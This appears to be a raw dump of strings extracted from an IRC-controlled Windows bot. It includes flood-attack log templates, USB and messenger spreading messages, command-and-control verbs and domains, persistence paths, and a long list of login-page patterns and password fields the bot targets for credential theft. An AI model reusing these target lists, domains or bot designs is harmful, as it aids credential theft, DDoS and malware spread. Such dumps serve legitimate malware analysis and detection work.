%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
a.baerr000.ru
a.joerv06.com
a.tsroxybaa.com
fbi.gov
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\312a36d2
C:\Windows\system32\csrss.exe
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe